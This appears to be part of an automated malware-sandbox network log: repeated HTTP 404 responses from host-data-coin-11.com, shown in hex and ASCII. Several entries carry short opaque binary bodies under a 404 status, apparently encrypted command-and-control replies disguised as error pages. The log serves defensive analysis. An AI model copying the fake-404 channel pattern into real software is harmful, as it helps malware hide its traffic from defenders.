                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Jan 2022 18:31:54 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 53 de 40 d7 fe 2e 82 25 ee a8 9a 51 2f ef be 4a 2b e3 b3 b7 6f f0 98 bc 5a aa 76 97 ca 33 42 56 36 03 4b d9 bb 41 bb f6 57 d9 b1 c2 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 61I:82OB%,YR("XS@.%Q/J+oZv3BV6KAW0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 42 f4 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OU?ABSvDg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Jan 2022 18:32:26 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Jan 2022 18:32:28 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 